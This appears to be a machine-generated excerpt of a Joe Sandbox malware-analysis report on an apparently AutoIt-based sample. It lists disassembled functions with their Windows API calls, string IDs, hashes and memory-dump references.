                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                • Opcode ID: 58904091aa2112481b8c07f0155a7f4fe18273be50611b56183ac315381faff9
                                                                                                                • Instruction ID: d9158c6af204a9ac360bd6cb557e2a70b9ffe75f9054b32e6a842f4189d3fa9b
                                                                                                                • Opcode Fuzzy Hash: 58904091aa2112481b8c07f0155a7f4fe18273be50611b56183ac315381faff9
                                                                                                                • Instruction Fuzzy Hash: 0B01B5B1621219ABCB04FF64CC518FE7369AF42350B640A19F462F72D2DB70692C9B50
                                                                                                                Function 0024C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                • Opcode ID: d0df5385093306e84bde25ff48c72c64ad1fc9f78cc50458773a7409f21795be
                                                                                                                • Instruction ID: ba200ab446b8129ec39a0031181688c1b7f69c24a8d46823fcd6ca26c7813795
                                                                                                                • Opcode Fuzzy Hash: d0df5385093306e84bde25ff48c72c64ad1fc9f78cc50458773a7409f21795be
                                                                                                                • Instruction Fuzzy Hash: 8401F572910228BEDB68DBA8C816FFE7BF89F15311F00415AE193D2181E5B8A718CB60
                                                                                                                Function 0023C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 0023C4E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                • Opcode ID: 2d61b68c5228323da46b926b2c2b3a23ce310963a591a22d9a6bd19866e885a9
                                                                                                                • Instruction ID: 51bfb6882fbadbb6fee612b873fb326c6b7a059bfe7d4219edea5cdf936fcac7
                                                                                                                • Opcode Fuzzy Hash: 2d61b68c5228323da46b926b2c2b3a23ce310963a591a22d9a6bd19866e885a9
                                                                                                                • Instruction Fuzzy Hash: 87018FF1661209ABDB04FBA4C962AFF73AC9B05740F240515A642F31C2EA545E2C9BA1
                                                                                                                Function 0023C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 0023C562
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                • Opcode ID: 1dcb2d479c02750d888e51b4f4ab4ad9d8fb368c8dfb049a99339e7f8b9be414
                                                                                                                • Instruction ID: 569829105d2887cc3eb8e577af0c2c89b27bd8804a1d7d69265a3dd6dfa5c660
                                                                                                                • Opcode Fuzzy Hash: 1dcb2d479c02750d888e51b4f4ab4ad9d8fb368c8dfb049a99339e7f8b9be414
                                                                                                                • Instruction Fuzzy Hash: 0101A2B1661209ABDB04FBA4C952EFF73AC9B01741F640115B443F31C2DA549E2D9BB1
                                                                                                                Function 0024804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                • String ID: #32770
                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                • Opcode ID: f0b9341ea92087710f845e6d6ba0123d84e76b130dc7b5d99567115e20e701ea
                                                                                                                • Instruction ID: 63a54700478e1489e3f2dec42ea9d3e17f454dcef883f8ed83de0cdc19c7b116
                                                                                                                • Opcode Fuzzy Hash: f0b9341ea92087710f845e6d6ba0123d84e76b130dc7b5d99567115e20e701ea
                                                                                                                • Instruction Fuzzy Hash: 14E0D83761023977D720EAA5BC4AEDBFBACEB517A4F000026F914D3081E670965587D4
                                                                                                                Function 0022DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __umatherr.LIBCMT ref: 0022DA2A
                                                                                                                  • Part of subcall function 0022DD86: __ctrlfp.LIBCMT ref: 0022DDE5
                                                                                                                • __ctrlfp.LIBCMT ref: 0022DA47
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __ctrlfp$__umatherr
                                                                                                                • String ID: xn'
                                                                                                                • API String ID: 219961500-4225176504
                                                                                                                • Opcode ID: 66cd4a3e95a2f0acdedd9d7f1644ef331fdf9e3c351132066c7b12381e5ca881
                                                                                                                • Instruction ID: 2b32eb5e323dabb6d43bc14d6260308f4c3babe7eb3cde51048a0813d876f2ea
                                                                                                                • Opcode Fuzzy Hash: 66cd4a3e95a2f0acdedd9d7f1644ef331fdf9e3c351132066c7b12381e5ca881
                                                                                                                • Instruction Fuzzy Hash: FDE06D72408A0EBADB027FD0F9066AA3BA5EF14310F804094F98C18196DFB284B49B57
                                                                                                                Function 0023B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0023B36B
                                                                                                                  • Part of subcall function 00222011: _doexit.LIBCMT ref: 0022201B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message_doexit
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                • Opcode ID: 6d29bebeb99cf5b5019a2d7831474291575703fd2cd5ea7b01f511405ffa7ab7
                                                                                                                • Instruction ID: 9d3156ebf250755e257e9dc5aea593b991ff7ade54ea5603e54b259352ec7ffe
                                                                                                                • Opcode Fuzzy Hash: 6d29bebeb99cf5b5019a2d7831474291575703fd2cd5ea7b01f511405ffa7ab7
                                                                                                                • Instruction Fuzzy Hash: C9D012313A533832D21526E57C4BFC577884F05B51F100015BF0C951D28AD2A5B456E9
                                                                                                                Function 0027BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0027BAB8
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0027BCAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                                                • String ID: WIN_XPe
                                                                                                                • API String ID: 510247158-3257408948
                                                                                                                • Opcode ID: 134c82318b296f056211f650086572e86a02554b53ce38f47a20c1c3b4a651e6
                                                                                                                • Instruction ID: 0ba47eb779104da1c3f2bf0ea89f7edebc19cc30a960477c5f7f448daea16512
                                                                                                                • Opcode Fuzzy Hash: 134c82318b296f056211f650086572e86a02554b53ce38f47a20c1c3b4a651e6
                                                                                                                • Instruction Fuzzy Hash: 2CE0A570C24109EBCB16EBA8D849AEDB7B8BB58301F14C486E42AA2051C7715A589F25
                                                                                                                Function 00268495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0026849F
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002684B2
                                                                                                                  • Part of subcall function 00248355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002483CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 3ee861ab4dda0a98bb51beb512bc38e7afc26fcf37d15dcec48e4c4ce1b585d8
                                                                                                                • Instruction ID: cf66a7db0300f9550c78ae26e2e1d1957a7cc8ad0d9c47cd8c113e3e0f54b240
                                                                                                                • Opcode Fuzzy Hash: 3ee861ab4dda0a98bb51beb512bc38e7afc26fcf37d15dcec48e4c4ce1b585d8
                                                                                                                • Instruction Fuzzy Hash: C2D022363A4318B7E724AB70BC0FFC7AB48AF14B00F000928730AAA1C0C9E0B804C720
                                                                                                                Function 002684C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002684DF
                                                                                                                • PostMessageW.USER32(00000000), ref: 002684E6
                                                                                                                  • Part of subcall function 00248355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002483CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 791a0c6bfae74e4338eeae25b7e28e374708ef57611fb0996f636521b2d12141
                                                                                                                • Instruction ID: 355d923804dff08f4a6400cb07c1f6e9fe22549a42c31cf845514da1148bf8f2
                                                                                                                • Opcode Fuzzy Hash: 791a0c6bfae74e4338eeae25b7e28e374708ef57611fb0996f636521b2d12141
                                                                                                                • Instruction Fuzzy Hash: F5D022323D13187BE724AB70BC0FFC7AB48AB18B00F000928730AAA1C0C9E0B804C724
                                                                                                                Function 0024D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0024D01E
                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0024D035
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: 7ffc44d8f3d7d87f09259e93300224ae44400079f1cb04034e279a1648d037f8
                                                                                                                • Instruction ID: 415bda3b05c7080ad76de18d29c161509581e8eed95bd5b42ad9838d2a0c38f6
                                                                                                                • Opcode Fuzzy Hash: 7ffc44d8f3d7d87f09259e93300224ae44400079f1cb04034e279a1648d037f8
                                                                                                                • Instruction Fuzzy Hash: 2AD05EB554130EBBDB10ABA0ED0EF99776CA700704F1041907A14D10E2D3B0E6598BA0